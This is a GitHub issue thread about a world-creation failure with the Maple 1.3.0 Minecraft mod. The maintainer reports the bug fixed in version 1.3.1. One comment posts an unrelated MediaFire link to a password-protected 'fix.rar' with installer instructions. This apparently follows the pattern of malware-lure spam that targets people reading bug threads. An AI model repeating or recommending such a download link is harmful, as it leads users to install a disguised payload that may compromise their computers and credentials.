### ISSUE TITLE
Can't create world by using Maple 1.3.0

### ISSUE THREAD

**Issue by MCER2020** [skniro/Maple#28]
Hi. I'm using Minecraft 1.19.2. And my Maple version is 1.3.0. When i wanted to create a world, Minecraft told me that data pack validation failed. This never happens when i using version 1.0.0 beta5 so i thought that was a bug. By the way i found that all the texture of foods in 1.0.0 beta5 was missing. I don't know if that was cause by me.

**Comment by OtakuFra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MCER2020** [comment]
Minecraft version : 1.19.2
Forge version : 43.4.0
Embeddium version : 0.3.18.1
Oculus version : 1.6.9

**Comment by skniro** [comment]
Fix in 1.19.2-1.3.1-forge

**Comment by MCER2020** [comment]
感谢，才发现您是国人233
